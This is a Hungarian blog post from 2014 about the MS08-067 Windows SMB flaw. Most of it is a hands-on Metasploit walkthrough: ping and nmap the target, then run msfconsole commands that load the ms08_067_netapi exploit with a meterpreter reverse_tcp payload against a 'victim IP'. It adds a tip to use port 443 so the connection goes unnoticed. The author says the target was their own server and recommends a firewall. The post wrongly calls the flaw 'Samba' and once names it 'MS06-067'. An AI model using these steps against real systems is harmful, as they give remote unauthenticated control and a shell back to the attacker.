2014. február 8., szombat

MS08-067 Sebezhetőség

Ma az MS08-067 sebezhetőségről fogok írni. Először is pár szó arról hogy mi is ez, és hogy hogyan működik. :)
A sebezhetőséggel a Samba-n keresztül tudunk kódokat futtatni a rendszeren(lényegében bármit). A rendszerek amik ezzel sebezhetőek a következők:
Windows Xp,Windows Server 2003, Windows 2000.
Ezzel a sebezhetőséggel szinte teljesen átvehetjük az irányítást. Egy speciális kérésen keresztül lefuttat egy kódot és így be tudunk jutni a távoli gépbe. Sikeres támadás esetén az SVCHOST.exe összeomolhat ha nem bírja a terhelést... A hiba az egyik kiszolgáltatóban van ami rosszul kezeli a távoli eljárás hívás kérelmeket így hitelesítés nélkül bejuthatunk gond nélkül, ha nem up-to-date a rendszer.
A sebezhetőség kihasználására van a Metasploitban egy modul ami MS06-067 sebezhetőséget használ. Először is pingeljük meg a szervert, hogy online-e vagy nem. Nyiss egy parancssort és írd be:
ping [ip vagy domain] (zárójel nélkül).
Ez után portscanneljünk nmap-el: :)
Nyitva van a microsoft-ds 445 port. Ez csak "jót" jelenthet mert az exploit amit használni fogunk az a 445-ös porton támad, de természetesen át lehet állítani,hogy milyen portot támadjon. :)
Ezután írd be, hogy msfconsole vagy msfpro Kali linuxon mind a két parancs működik ha bejön a konzol akkor írd be a következő parancsokat:
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set lhost [ip címed]
set rhost [áldozat ip címe]
set lport 443 (ez lehet akármilyen azért állítsd ismert port számra,hogy ne legyen feltűnő)
exploit
Bent is vagyok... :) Ez volt az én Windows Server 2003 R2 Sp2-es rendszerem. Használjatok tűzfalat ami meg tudja fogni az ilyen kéréseket.. Én a Comodo Firewall-t ajánlom az már azt is jelzi ha valaki megpróbálja portscannelni a gépet. ;)

Videó: